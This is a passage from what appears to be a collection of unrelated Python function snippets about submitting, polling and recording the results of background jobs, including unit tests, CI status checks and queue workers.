parse_job_outputs.signature(**job.signature_kwargs).apply_async\n )", "def process_action_result(self, service):\n logger.info(\"Notified of action result:\\n%s\", pretty_json(service))\n annotations = service.get('annotations', {})\n instance_id = annotations.get('instance_id')\n action_name = annotations.get('action')\n if not instance_id:\n logger.warning(\"Received action result without 'instance_id' annotation\")\n return\n with lock_instance(instance_id):\n instance = self.get_fixture_instance(id=instance_id, verify_exists=False)\n if not instance:\n logger.warning(\"Received action result for instance which does not exist\")\n return\n if not instance.operation:\n # This theoretically could happen if we somehow process the job status twice\n # (e.g. one by axops and one by a backup GC process)\n logger.warning(\"%s no longer associated with job %s\", instance, service['id'])\n return\n if service['id'] != instance.operation['id']:\n logger.warning(\"Notified of action result (job: %s) which does not match current operation (job: %s)\", service['id'], instance.operation['id'])\n return\n if not ServiceStatus.completed(service['status']):\n logger.warning(\"Notified of incomplete job %s (status: %s)\", service['id'], service['status'])\n return\n\n logger.info(\"%s completed service %s\", instance, service['id'])\n if service['status'] == ServiceStatus.SUCCESS:\n status_detail_message = \"\"\n if instance.status == InstanceStatus.DELETING:\n status_detail_message = \"Deleted by user {}\".format(service['user'])\n instance.transition_state(Event.ACTION_SUCCESS, status_detail_message)\n elif service['status'] in [ServiceStatus.CANCELLED, ServiceStatus.SKIPPED]:\n if instance.status in [InstanceStatus.CREATING, InstanceStatus.DELETING]:\n # a canceled/skipped job for create/delete is considered create/delete failure\n instance.transition_state(Event.ACTION_FAILURE, \"\")\n else:\n # ignore disable policy for cancelled jobs, simply move it back to 'active' state\n instance.transition_state(Event.ACTION_SUCCESS, \"\")\n else:\n instance.transition_state(Event.ACTION_FAILURE, \"\")\n\n self.set_enabled_from_policy(instance, service['status'], action_name)\n self.update_attributes_from_artifacts(instance, service)\n self._persist_instance_updates(instance)\n\n if instance.status == InstanceStatus.ACTIVE:\n # this fixture made it to active pool so trigger processor\n self.reqproc.trigger_processor()", "def _add_job_data(\n self,\n job: Job,\n ) -> Tuple[str, bool]:\n jid = job.job_id()\n try:\n job_result = job.result()\n self._add_result_data(job_result, jid)\n LOG.debug(\"Job data added [Job ID: %s]\", jid)\n # sets the endtime to be the time the last successful job was added\n self.end_datetime = datetime.now()\n return jid, True\n except Exception as ex: # pylint: disable=broad-except\n # Handle cancelled jobs\n status = job.status()\n if status == JobStatus.CANCELLED:\n LOG.warning(\"Job was cancelled before completion [Job ID: %s]\", jid)\n return jid, False\n if status == JobStatus.ERROR:\n LOG.error(\n \"Job data not added for errored job [Job ID: %s]\\nError message: %s\",\n jid,\n job.error_message(),\n )\n return jid, False\n LOG.warning(\"Adding data from job failed [Job ID: %s]\", job.job_id())\n raise ex", "def v2_runner_on_ok(self, result):\n super(Callback, self).v2_runner_on_ok(result)\n self._store(result, STATUS_OK)", "def handle_result(self) -> Callable[['Request'], 'Request']:\n\n def _handle_result(result: 'Request'):\n \"\"\"\n Function that handles the result when extracted from the request future\n\n :param result: The result returned to the gateway. It extracts the request to be returned to the client\n :return: Returns a request to be returned to the client\n \"\"\"\n for route in result.routes:\n if route.executor == GATEWAY_NAME:\n route.end_time.GetCurrentTime()\n\n self._update_end_request_metrics(result)\n\n return result\n\n return _handle_result", "def mark(self, job, status='succeeded'):\n pass", "def run(self):\n\t\tlog = logging.getLogger()\n\t\tsuccess = True\n\t\tself.task[\"custom\"] = str(self.task[\"custom\"])\n\t\tself.db = CuckooDatabase()\n\n\t\t# Generate analysis results storage folder path with current task id.\n\t\tresults_path = CuckooConfig().get_analysis_results_path()\n\t\tsave_path = os.path.join(results_path, str(self.task[\"id\"]))\n\n\t\tif (self.task[\"custom\"] == \"sleep\"):\n\t\t\timport time\n\t\t\t# sleep longer than default timeout of hsn2-cuckoo\n\t\t\ttime.sleep(905)\n\t\t# Additional check to verify that the are not saved results with the\n\t\t# same task ID.\n\t\tif os.path.exists(save_path):\n\t\t\tlog.error(\"There are already stored results for current task \" \\\n\t\t\t\t\t \"with ID %d at path \\\"%s\\\". Abort.\"\n\t\t\t\t\t % (self.task[\"id\"], save_path))\n\t\t\tself.db.complete(self.task[\"id\"], False)\n\t\t\treturn False\n\n\t\t# Check if target file exists.\n\t\tlog.debug(os.path.exists(self.task[\"custom\"]))\n\t\tif not os.path.exists(self.task[\"custom\"]):\n\t\t\tlog.error(\"Cannot find custom file \\\"%s\\\". Abort.\"\n\t\t\t\t\t % self.task[\"custom\"])\n\t\t\tself.db.complete(self.task[\"id\"], False)\n\t\t\treturn False\n\n\t\t# Check if target is a directory.\n\t\tif os.path.isdir(self.task[\"custom\"]):\n\t\t\tlog.error(\"Specified target \\\"%s\\\" is a directory. Abort.\"\n\t\t\t\t\t % self.task[\"custom\"])\n\t\t\tself.db.complete(self.task[\"id\"], False)\n\t\t\treturn False\n\n\t\t# 4. Extract appropriate log archive as mock logs analysis results\n\t\t# Modified _save_results so that it extracts the tar file passed in target\n\t\tself._save_results(self.task[\"custom\"], save_path)\n\n\t\t# 5. Update task in database with proper status code.\n\t\tif success:\n\t\t\tself.db.complete(self.task[\"id\"], True)\n\t\telse:\n\t\t\tself.db.complete(self.task[\"id\"], False)\n\t\tlog.info(\"Analyis completed.\")\n\n\t\treturn True", "def _poll_for_new_result(session, job):\n while job['status'] not in (3, 4):\n response = session.get('{}/api/jobs/{}'.format(REDASH_HOST, job['id']))\n job = response.json()['job']\n time.sleep(POLL_INTERVAL)\n\n if job['status'] == 3:\n return job['query_result_id']\n return None", "def run_job(self, job, config=None):\n # TRANSLATORS: %r is the name of the job\n logger.info(_(\"Running %r\"), job)\n func_name = \"run_{}_job\".format(job.plugin.replace('-', '_'))\n try:\n runner = getattr(self, func_name)\n except AttributeError:\n return MemoryJobResult({\n 'outcome': IJobResult.OUTCOME_NOT_IMPLEMENTED,\n 'comment': _('This type of job is not supported'),\n })\n else:\n if self._dry_run and job.plugin not in self._DRY_RUN_PLUGINS:\n return self._get_dry_run_result(job)\n else:\n return runner(job, config)", "def run(self, job_result):\n self.logger.info(f\"Running report\")\n job_result.status = JobResultStatusChoices.STATUS_RUNNING\n job_result.save()\n\n try:\n\n for method_name in self.test_methods:\n self.active_test = method_name\n test_method = getattr(self, self.test_methods[method_name])\n test_method()\n\n if self.failed:\n self.logger.warning(\"Report failed\")\n job_result.status = JobResultStatusChoices.STATUS_FAILED\n else:\n self.logger.info(\"Report completed successfully\")\n job_result.status = JobResultStatusChoices.STATUS_COMPLETED\n\n except Exception as e:\n stacktrace = traceback.format_exc()\n self.log_failure(None, f\"An exception occurred: {type(e).__name__}: {e} <pre>{stacktrace}</pre>\")\n logger.error(f\"Exception raised during report execution: {e}\")\n job_result.set_status(JobResultStatusChoices.STATUS_ERRORED)\n\n job_result.data = self._results\n job_result.completed = timezone.now()\n job_result.save()\n\n # Perform any post-run tasks\n self.post_run()", "def results_checker(result):\n global pool\n global stop_all\n global results\n global jobfiles_global\n global jobwcl\n global job_track\n global result_lock\n global lock_monitor\n global donejobs\n global keeprunning\n global terminating\n try:\n (res, jobf, wcl, usage, wrapnum, pid) = result\n jobfiles_global['outfullnames'].extend(jobf['outfullnames'])\n jobfiles_global['output_putinfo'].update(jobf['output_putinfo'])\n if not terminating:\n del job_track[wrapnum]\n if usage > jobwcl['job_max_usage']:\n jobwcl['job_max_usage'] = usage\n results.append(res)\n # if the current thread exited with non-zero status, then kill remaining threads\n # but keep the log files\n\n if (res != 0 and stop_all) and not terminating:\n if result_lock.acquire(False):\n keeprunning = False\n try:\n # manually end the child processes as pool.terminate can deadlock\n # if multiple threads return with errors\n terminate(save=[pid], force=True)\n for _, (logfile, jobfiles) in job_track.iteritems():\n filemgmt = dynam_load_filemgmt(wcl, None)\n\n if logfile is not None and os.path.isfile(logfile):\n # only update the log if it has not been ingested already\n if not filemgmt.has_metadata_ingested('log', logfile):\n lfile = open(logfile, 'a')\n lfile.write(\"\\n****************\\nWrapper terminated early due to error in parallel thread.\\n****************\")\n lfile.close()\n logfileinfo = save_log_file(filemgmt, wcl, jobfiles, logfile)\n jobfiles_global['outfullnames'].append(logfile)\n jobfiles_global['output_putinfo'].update(logfileinfo)\n time.sleep(10)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback,\n limit=4, file=sys.stdout)\n finally:\n keeprunning = False\n else:\n result_lock.acquire()\n\n except:\n keeprunning = False\n print \"Error: thread monitoring encountered an unhandled exception.\"\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback,\n limit=4, file=sys.stdout)\n results.append(1)\n finally:\n if not result_lock.acquire(False):\n result_lock.release()\n lock_monitor.acquire()\n lock_monitor.notify_all()\n lock_monitor.release()\n else:\n result_lock.release()\n\n donejobs += 1", "def check_result(self, params, server):\n if server['building']:\n # I assume Server and client are on the same TimeZone\n # the API doesn't tell me where is the server (only /systemInfo)\n job_started = datetime.fromtimestamp(int(server['timestamp']) / 1000)\n time_delta = (params['now'] - job_started)\n\n # New in version 2.7 --> datetime.timedelta.total_seconds\n # we want python >= 2.4 so we will do it ourselves\n seconds_since_start = time_delta.seconds + time_delta.days * 86400\n job_duration = self.seconds2human(seconds_since_start)\n if (seconds_since_start >= params['critical'] * 60):\n msg = '%s has been running for %s, see %sconsole#footer' % (\n params['job'],\n job_duration,\n server['url'])\n status = 'CRITICAL'\n elif (seconds_since_start >= params['warning'] * 60):\n msg = '%s has been running for %s, see %sconsole#footer' % (\n params['job'],\n job_duration,\n server['url'])\n status = 'WARNING'\n else:\n msg = '%s still running after %s, watch it on %sconsole#footer' % (\n params['job'],\n job_duration,\n server['url'])\n status = 'OK'\n else:\n # Easy part, the job has completed ...\n if server['result'] == 'SUCCESS':\n duration = self.seconds2human(server['duration'] / 1000)\n msg = '%s exited normally after %s' % (params['job'], duration)\n status = 'OK'\n\n elif server['result'] == 'UNSTABLE':\n duration = self.seconds2human(server['duration'] / 1000)\n msg = '%s is marked as unstable after %s, see %sconsole#footer' % (\n params['job'], duration, server['url'])\n status = 'WARNING'\n\n elif server['result'] == 'FAILURE':\n msg = '%s exited with an error, see %sconsole#footer' % (\n params['job'], server['url'])\n status = 'CRITICAL'\n\n elif server['result'] == 'ABORTED':\n msg = '%s has been aborted, see %sconsole#footer' % (\n params['job'], server['url'])\n status = 'UNKNOWN'\n else:\n # If you get there, patch welcome\n msg = '%s is in a not known state, Jenkins API issue ? see %s' % (\n params['job'], server['url'])\n status = 'UNKNOWN'\n\n return(status, msg)", "def process(self):\n # return ProcessorResult(True, _('OK'))\n return (True, _(\"OK\"))", "def handle_specific_job(job, manager):\n job_id = job['job_id']\n job_type = job['job_type']\n\n if job_type == 'documents':\n results = find_documents_data(manager, job, job_id)\n\n elif job_type == 'document':\n results = find_document_data(manager, job, job_id)\n\n elif job_type == 'docket':\n results = find_docket_data(manager, job, job_id)\n\n elif job_type == 'download':\n results = find_download_data(manager, job, job_id)\n\n elif job_type == 'none':\n return None\n\n return results", "def _process_upload_job_async(self, job):\n logger.info('Uploading file to Sia: %s', job.local_path)\n try:\n return self._sia_client.upload_file_async(job.local_path,\n job.sia_path)\n except Exception as ex:\n logger.error('Upload failed: %s', ex.message)\n job.increment_failure_count()\n return False", "def _wait_for_results(self) -> RemoteCallableResult:\n if (\n self.subscriber is None or\n self.started is None or\n self.process is None\n ):\n raise dbt.exceptions.InternalException(\n '_wait_for_results() called before handle()'\n )\n\n try:\n msg = self.subscriber.dispatch_until_exit(\n started=self.started,\n timeout=self.timeout,\n )\n except dbt.exceptions.Exception as exc:\n raise dbt_error(exc)\n except Exception as exc:\n raise server_error(exc)\n if isinstance(msg, QueueErrorMessage):\n raise RPCException.from_error(msg.error)\n elif isinstance(msg, QueueTimeoutMessage):\n if not self._single_threaded:\n self.process.terminate()\n raise timeout_error(self.timeout)\n elif isinstance(msg, QueueResultMessage):\n return msg.result\n else:\n raise dbt.exceptions.InternalException(\n 'Invalid message type {} (result={})'.format(msg)\n )", "def run(self,id=None):\n # loop until the process is running or halted.\n while 1:\n\n my_job_status, my_job = self.find_job_and_job_status()\n\n if not my_job_status:\n time.sleep(5)\n continue\n\n if sum(map(lambda st: int(st==my_job_status), self.return_status)) > 0:\n return (my_job_status, my_job.printOld())\n\n time.sleep(5)\n continue", "def test_py_job_result(self):\n test_app = self._create_py_app()\n class_path = \"example_jobs.word_count.WordCountSparkSessionJob\"\n conf = \"input.strings = ['a', 'b', 'a', 'b']\"\n job = self._create_job(test_app, class_path, conf,\n ctx=self._get_functional_py_context())\n time.sleep(3)\n self._wait_till_job_is_done(job)\n job = self.client.jobs.get(job.jobId)\n self.assertEqual(\"FINISHED\", job.status)\n self.assertEqual({\"'a'\": 2, \"'b'\": 2}, job.result)", "async def status(self) -> JobStatus:\n async with self._redis.pipeline(transaction=True) as tr:\n tr.exists(result_key_prefix + self.job_id) # type: ignore[unused-coroutine]\n tr.exists(in_progress_key_prefix + self.job_id) # type: ignore[unused-coroutine]\n tr.zscore(self._queue_name, self.job_id) # type: ignore[unused-coroutine]\n is_complete, is_in_progress, score = await tr.execute()\n\n if is_complete:\n return JobStatus.complete\n elif is_in_progress:\n return JobStatus.in_progress\n elif score:\n return JobStatus.deferred if score > timestamp_ms() else JobStatus.queued\n else:\n return JobStatus.not_found", "def put_job_success(job, message):\n print('Putting job success')\n print(message)\n code_pipeline.put_job_success_result(jobId=job)", "def handle_upld_data(self, job):\n if job.data[\"high_reliability\"]:\n # Upload the file to all servers\n self.put_job_in_all_queues(job)\n\n list_job_results = self.get_internal_results_from_all_servers()\n\n if len(list_job_results) == 0:\n # We got no responses back, there are probably no servers active\n self.put_external_result(self.generate_failure_job(\"Unsuccessful, no servers responded\"))\n return\n\n # Check all the servers had success\n for result in list_job_results:\n if result.result[\"outcome\"] != \"success\":\n self.put_external_result(\n self.generate_failure_job(\"Unsuccessful, one of the servers did not have success\"))\n return\n\n # Tell the client we successfully uploaded to all servers\n response_result = copy.deepcopy(list_job_results[0])\n response_result.processed_by = None\n self.put_external_result(response_result)\n\n else:\n\n # Check we recognise the token\n if job.token not in self.UPLD_TOKEN_DICT:\n print(\"UNRECOGNISED TOKEN: {}\".format(job.token))\n return\n\n # Pass the job onto the server associated with the job token\n server_name = self.UPLD_TOKEN_DICT[job.token]\n self.put_job_in_specific_server_queue(job, server_name)\n\n # Get the result from the server and pass it back to the client\n result = self.get_internal_result_from_server(server_name,\n timeout=30\n if job.data[\"file_size\"] > 2 * 2 ** 20 else 4)\n self.put_external_result(result)", "def check_results(request):\n \n # Check if an ID was supplied.\n if ('ID' not in request.GET):\n response = HttpResponse()\n response.status_code = 400 # Bad Request\n response.reason_phrase = (\"No ID was passed. The ID used to start \"\n \"the classification job must be sent to \"\n \"check the progress. The ID should be \"\n \"passed in a parameter named 'ID'.\")\n return response\n \n # Ensure a file exists with the specified ID.\n id = request.GET['ID']\n if (not File.objects.filter(file_name=id).exists()):\n response = HttpResponse()\n response.status_code = 400 # Bad Request\n response.reason_phrase = ('The passed ID was invalid. If the ID you '\n 'sent was returned by a validate request, '\n 'it is possible the ID has expired and the '\n 'job was deleted.')\n \n # Retrieve the job for the requested file.\n file = File.objects.get(file_name=id)\n job = file.job\n \n # If the job is complete, send the results. Otherwise, send all of the\n # updates for the job.\n has_result = JobResult.objects.filter(job=job).exists()\n return job_results(request, job) if has_result else \\\n job_updates(request, job)", "def compute(self):\n try:\n self.set_trackline()\n except:\n app.logger.warning(\"Could not process trackline results. URL may be invalid?\")\n\n if Job.exists(self.task_id, connection=redis_connection):\n job = Job.fetch(self.task_id, connection=redis_connection)\n self.task_result = unicode(job.meta.get(\"outcome\", \"\"))\n\n self.save()", "def work(self, job):\n pass", "def test_successful_execution(self):\n\n url = '/%s/jobs/%i/' % (self.api, self.job.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n\n self.assertEqual(result['execution']['job']['id'], self.job.id)\n self.assertEqual(result['execution']['job_type']['id'], self.job_type.id)\n self.assertEqual(result['execution']['exe_num'], self.job_exe.exe_num)", "def test_jobs_successful(self):\n\n workspace = storage_test_utils.create_workspace()\n file1 = storage_test_utils.create_file()\n data_dict = {\n 'version': '1.0',\n 'input_data': [{\n 'name': 'INPUT_IMAGE',\n 'file_id': file1.id\n }],\n 'output_data': [{\n 'name': 'output_file_pngs',\n 'workspace_id': workspace.id\n }]}\n\n secret_configuration = {\n 'version': '6',\n 'priority': 50,\n 'output_workspaces': {'default': storage_test_utils.create_workspace().name},\n 'settings': {\n 'DB_HOST': 'som.host.name',\n 'DB_PASS': 'secret_password'\n }\n }\n\n seed_job_type = job_test_utils.create_seed_job_type(configuration=secret_configuration)\n seed_job = job_test_utils.create_job(job_type=seed_job_type, status='RUNNING', input=data_dict)\n\n url = '/%s/jobs/%d/' % (self.api, seed_job.id)\n response = self.client.generic('GET', url)\n result = json.loads(response.content)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n self.assertEqual(result['configuration']['priority'],50)\n self.assertNotIn('DB_PASS', result['configuration']['settings'])", "def find_job_and_job_status(self):\n\n def find_job_and_job_status_log_history(f):\n rcelog('critical', \"find_job_and_status(): Found job {0} in history. Terminated in error.\".\n format(self.id))\n return f\n\n try:\n return self.__get_job_status_from_queue__()\n except:\n pass\n\n try:\n return find_job_and_job_status_log_history(self.__get_job_status_from_history__())\n except:\n return (None, None)", "def test_results_success(self, affiliate_items):\n success_count = 0\n\n updater = mock.Mock()\n batch_job = BatchJob(affiliate_items, updater)\n\n for result in batch_job.run():\n success_count += int(not result.is_error)\n\n assert success_count == 4", "def execute(self, context: Context) -> None:\n self.hook = AirbyteHook(airbyte_conn_id=self.airbyte_conn_id, api_version=self.api_version)\n job_object = self.hook.submit_sync_connection(connection_id=self.connection_id)\n self.job_id = job_object.json()[\"job\"][\"id\"]\n\n self.log.info(\"Job %s was submitted to Airbyte Server\", self.job_id)\n if not self.asynchronous:\n self.log.info(\"Waiting for job %s to complete\", self.job_id)\n self.hook.wait_for_job(job_id=self.job_id, wait_seconds=self.wait_seconds, timeout=self.timeout)\n self.log.info(\"Job %s completed successfully\", self.job_id)\n\n return self.job_id", "def process_job(q):\n del log_msg[:]\n logger.info('Processing Job %s', q.id)\n\n datatype = q.datatype\n input_dir = q.input_dir\n output_dir = q.output_dir\n processor = q.processor\n if datatype.lower() == 'laz':\n block_name = proper_block_name(input_dir)\n elif datatype.lower() == 'ortho':\n block_name = proper_block_name_ortho(input_dir)\n if datatype.lower() == 'laz' or datatype.lower() == 'ortho':\n logger.info('Verifying las tiles in directory...')\n log_msg.append('Verifying las tiles in directory...\\n')\n has_error, remarks = verify_dir(input_dir, datatype.lower())\n\n if has_error:\n assign_status(q, error=True)\n log_msg.append('Error in verify_las/verify_raster!\\n {0} \\n'.format(remarks))\n else:\n logger.info('Renaming tiles...')\n\n logger.info('BLOCK NAME %s', block_name)\n log_msg.append('BLOCK NAME {0}\\n'.format(block_name))\n\n in_coverage, block_uid = find_in_coverage(block_name)\n\n #: Check first if folder or `block_name` is in `Cephgeo_LidarCoverageBlock`\n #: If not found, `output_dir` is not created and data is not processed\n if in_coverage:\n logger.info('Found in Lidar Coverage model %s %s',\n block_name, block_uid)\n log_msg.append('Found in Lidar Coverage model {0} {1}\\n'.format(\n block_name, block_uid))\n\n rename_tiles(input_dir, output_dir, processor,\n block_name, block_uid, q)\n logger.info('Status %s Status Timestamp %s',\n q.status, q.status_timestamp)\n log_msg.append('Status {0} Status Timestamp {1}\\n'.format(\n q.status, q.status_timestamp))\n\n else:\n has_error = True\n logger.error('ERROR NOT FOUND IN MODEL %s %s', block_name, block_uid)\n log_msg.append('ERROR NOT FOUND IN MODEL {0} {1}\\n'.format(block_name, block_uid))\n assign_status(q, error=True)\n # for DEM\n else:\n logger.info('Handler not implemented for type: %s',\n str(q.datatype))\n log_msg.append('Handler not implemented for type: {0}\\n'.format(\n str(q.datatype)))\n assign_status(q, error=True)\n\n paragraph = ''\n for par in log_msg:\n paragraph = paragraph + par\n\n #: Save log messages from renaming tiles to `Automation_AutomationJob.log`\n with PSQL_DB.atomic() as txn:\n new_q = (Automation_AutomationJob\n .update(data_processing_log=paragraph, status_timestamp=datetime.now())\n .where(Automation_AutomationJob.id == q.id))\n new_q.execute()", "def check_result(self, result):\n self.log.info(\"--check_result, result= %s\", result)\n if result[0]['exit_status'] != 0:\n self.fail(\"##Error detected from check_result\")\n else:\n self.log.info(\"--check_result passed\")", "def _work_function(job_q, result_q, error_q):\r\n # type: (Queue, Queue, Queue) -> None\r\n while True:\r\n job = job_q.get()\r\n\r\n if isinstance(job, _ThreadPoolSentinel):\r\n # All the work is done, get out\r\n result_q.put(_ThreadPoolSentinel())\r\n error_q.put(_ThreadPoolSentinel())\r\n job_q.task_done()\r\n break\r\n\r\n function = job[0]\r\n args = job[1]\r\n try:\r\n result = function(*args)\r\n except Exception as e:\r\n error_q.put((job, e))\r\n else:\r\n result_q.put((job, result))\r\n finally:\r\n job_q.task_done()", "def test_successful(self):\n\n url = '/%s/job-types/running/' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['job_type']['name'], self.job.job_type.name)\n self.assertEqual(result['results'][0]['count'], 1)\n self.assertIsNotNone(result['results'][0]['longest_running'])", "def put_job(self, job):\n\n # Handle the job, depending on its command\n if job.command == \"UPLD_INIT\":\n self.handle_upld_init(job)\n elif job.command == \"UPLD_DATA\":\n self.handle_upld_data(job)\n elif job.command == \"DWLD\":\n self.handle_dwld(job)\n elif job.command == \"DELF_INIT\":\n self.handle_delf_init(job)\n elif job.command == \"DELF_CONF\":\n self.handle_delf_conf(job)\n elif job.command == \"LIST\":\n self.handle_list(job)\n else:\n print(\"Unrecognised command: {}\".format(job.command))\n return", "def _base_check(self, func, on_true, on_false, *args, otherwise=\"\"):\n\n # Retrieve information about the line number and filename of the check.\n frame = inspect.currentframe().f_back\n lineno = frame.f_lineno\n filepath = frame.f_globals[\"__file__\"]\n filename = os.path.basename(filepath)\n\n # Try and run the check. If we run into an exception, report it.\n try:\n if func(*args):\n result, data = SUCCESS, on_true.format(*args)\n else:\n result, data = FAILURE, on_false.format(*args)\n except Exception as e:\n result, data = ERROR, str(e)\n\n # Display and record our results.\n dots(result)\n self.results.append(\n Result(result=result, data=data, case=self.case, alt=otherwise,\n filename=filename, lineno=lineno)\n )", "def callFromWorker(cls, func, args, on_success=None, on_failure=None, on_complete=None):\n worker = cls(func, args)\n if on_success is not None:\n worker.job_succeeded.connect(on_success)\n if on_failure is not None:\n worker.job_failed.connect(on_failure)\n if on_complete is not None:\n worker.finished.connect(on_complete)\n worker.start()\n\n return worker", "def get_result(self):\n\t\treturn handle_to_object(call_sdk_function('PrlJob_GetResult', self.handle))", "def multiprocessing_job(self, job_function: Callable[['Task.Task'], 'Task.Task']=None) -> None:\n\n if job_function is None:\n raise ValueError(\"Job Function object not provided.\")\n while True:\n try:\n task = self.input_queue.get(timeout=1)\n if task:\n '''\n Based on how this should work, job_function must take\n in a Submission object as its sole parameter, and\n return a Submission object. To avoid major overhauls,\n it's best to keep the '*_job' functions mostly the same,\n but changing the function parametes and what it returns.\n '''\n if self.logger.getEffectiveLevel() == logging.DEBUG:\n self.logger.debug(f\"\\nTask Received: {task._to_string()}\\n\")\n else:\n self.logger.info(f\"\\nTask Received: {task.get_job_id()} containing file {task.get_file_name()}\\n\")\n try:\n # Push the name of the manager and its current jobs.\n if self.slack_queue:\n slack_information = [self.name, task.fetch_info('user_initials'), task.get_file_name(), \"Pending\", 1]\n self.push_information_to_slack_bot(self.slack_queue, slack_information)\n # Perform the job function on the task\n task = job_function(task)\n # Upon success, push information to the Slack Bot (if enabled)\n if self.slack_queue:\n slack_information = [self.name, task.fetch_info('user_initials'), task.get_file_name(), \"Complete\", 2]\n self.push_information_to_slack_bot(self.slack_queue, slack_information)\n # Log the task completion\n self.logger.info(f\"\\nTask Completed: {task.get_job_id()} containing file {task.get_file_name()}\\n\")\n # Place the task in the output queue\n self.output_queue.put(task)\n # Mark the task as finished via task_done\n self.input_queue.task_done()\n # Take a short breather and let the CPU focus on other stuff.\n sleep(1)\n except KeyboardInterrupt as k:\n if self.logger.getEffectiveLevel() == logging.DEBUG:\n self.logger.exception(msg=f\"Task {task.job_id} encountered an exception in job {job_function.__name__} due to SIGINT event.\\n\")\n else:\n self.logger.error(msg=f\"\\nTask {task.job_id} encountered an exception in job {job_function.__name__}\\nError Message: {k}\\n\")\n # If any errors that can be caught occur\n except BaseException as e:\n # Log the event with varying degrees of information\n if self.logger.getEffectiveLevel() == logging.DEBUG:\n self.logger.exception(msg=f\"Task {task.job_id} encountered an exception in job {job_function.__name__}\\nTask Information:\\n{task._to_string()}\")\n else:\n self.logger.error(msg=f\"\\nTask {task.job_id} encountered an exception in job {job_function.__name__}\\nError Message: {e}\\n\")\n # Inform the submitter via Slack Notification (not Slack Bot)\n # If the Slack Bot is enabled pass the error information to it\n if self.slack_queue:\n slack_information = [self.name, task.fetch_info('user_initials'), task.get_file_name(), \"Error\", 2]\n self.push_information_to_slack_bot(self.slack_queue, slack_information)\n # Place the task in the error queue\n self.error_queue.put(task)\n # Mark the task as finished via task_done\n self.input_queue.task_done()\n else:\n #Media was None signal (this kills the Process)\n self.input_queue.task_done()\n break\n except ValueError:\n break\n # If the worker does not receive anything it will throw this exception, which will kill the process.\n except queue.Empty:\n self.logger.debug(f\"\\nA process has enountered the Queue.Empty exception indicating there are no more things to process.\")\n break", "def reprocess(self):\n self._log.debug(\"About to reprocess job {0}\".format(self.id))\n resp = self._api.reprocess(self.id)\n\n if resp.success:\n return True\n\n if resp.result.type is None:\n # Call was successful but job was unable to be reprocessed.\n return False\n\n else:\n raise resp.result", "def wait_for_job(self, value):\n logger.info('Waiting for job %s' % self.job_name)\n\n if self.provider_options.dry_run == True:\n logger.info('Dry run: continuing')\n else:\n logger.info('Checking job status...')\n provider = provider_base.get_provider(self.provider_options)\n\n while True:\n tasks = provider.lookup_job_tasks('*', job_name_list=[self.job_name], max_jobs=1)\n logger.debug('Tasks: %s' % tasks)\n\n if not tasks:\n raise RuntimeError('Job not found: %s' % self.job_name)\n\n is_running = False\n status = None\n\n # Wait until all tasks succeed; abort if any task fails or is canceled\n for task in tasks:\n status = provider.get_task_field(task, 'job-status')\n\n if status == 'RUNNING':\n is_running = True\n elif status == 'CANCELED':\n raise RuntimeException('Job %s: CANCELED' % self.job_name)\n elif status == 'FAILURE':\n error = provider.get_task_field(task, 'error-message')\n raise RuntimeException('Job %s: FAILURE. Error message: %s' % (self.job_name, error))\n\n if is_running:\n time.sleep(self.poll_interval)\n else:\n break\n\n logger.info('Job %s: SUCCESS' % self.job_name)\n return 'Success'", "def GetResult(jobid, g_params): # {{{\n # retrieving result from the remote server for this job\n gen_logfile = g_params['gen_logfile']\n gen_errfile = g_params['gen_errfile']\n\n webcom.loginfo(f\"GetResult for {jobid}.\\n\", gen_logfile)\n\n path_static = g_params['path_static']\n path_result = os.path.join(path_static, 'result')\n path_cache = g_params['path_cache']\n finished_date_db = g_params['finished_date_db']\n name_server = g_params['name_server']\n\n rstdir = os.path.join(path_result, jobid)\n runjob_logfile = os.path.join(rstdir, \"runjob.log\")\n runjob_errfile = os.path.join(rstdir, \"runjob.err\")\n outpath_result = os.path.join(rstdir, jobid)\n if not os.path.exists(outpath_result):\n os.mkdir(outpath_result)\n\n remotequeue_idx_file = os.path.join(rstdir, \"remotequeue_seqindex.txt\")\n\n torun_idx_file = os.path.join(rstdir, \"torun_seqindex.txt\")\n finished_idx_file = os.path.join(rstdir, \"finished_seqindex.txt\")\n query_parafile = os.path.join(rstdir, \"query.para.txt\")\n\n query_para = {}\n if os.path.exists(query_parafile):\n content = myfunc.ReadFile(query_parafile)\n if content != \"\":\n try:\n query_para = json.loads(content)\n except ValueError:\n query_para = {}\n failed_idx_file = os.path.join(rstdir, \"failed_seqindex.txt\")\n\n starttagfile = os.path.join(rstdir, \"runjob.start\")\n cnttry_idx_file = os.path.join(rstdir, \"cntsubmittry_seqindex.txt\") # index file to keep log of tries\n tmpdir = os.path.join(rstdir, \"tmpdir\")\n finished_seq_file = os.path.join(outpath_result, \"finished_seqs.txt\")\n\n if not os.path.exists(tmpdir):\n os.mkdir(tmpdir)\n\n finished_info_list = [] # [info for finished record]\n finished_idx_list = [] # [origIndex]\n failed_idx_list = [] # [origIndex]\n resubmit_idx_list = [] # [origIndex]\n keep_queueline_list = [] # [line] still in queue\n\n cntTryDict = {}\n if os.path.exists(cnttry_idx_file):\n with open(cnttry_idx_file, 'r') as fpin:\n try:\n cntTryDict = json.load(fpin)\n except Exception:\n cntTryDict = {}\n\n # in case of missing queries, if remotequeue_idx_file is empty but the job\n # is still not finished, force recreating torun_idx_file\n if 'DEBUG' in g_params and g_params['DEBUG']:\n try:\n webcom.loginfo(\"DEBUG: %s: remotequeue_idx_file=%s, size(remotequeue_idx_file)=%d, content=\\\"%s\\\"\\n\" %(jobid, remotequeue_idx_file, os.path.getsize(remotequeue_idx_file), myfunc.ReadFile(remotequeue_idx_file)), gen_logfile)\n except Exception:\n pass\n if ((not os.path.exists(remotequeue_idx_file) or # {{{\n os.path.getsize(remotequeue_idx_file) < 1)):\n idlist1 = []\n idlist2 = []\n if os.path.exists(finished_idx_file):\n idlist1 = myfunc.ReadIDList(finished_idx_file)\n if os.path.exists(failed_idx_file):\n idlist2 = myfunc.ReadIDList(failed_idx_file)\n\n completed_idx_set = set(idlist1 + idlist2)\n\n jobinfofile = os.path.join(rstdir, \"jobinfo\")\n jobinfo = 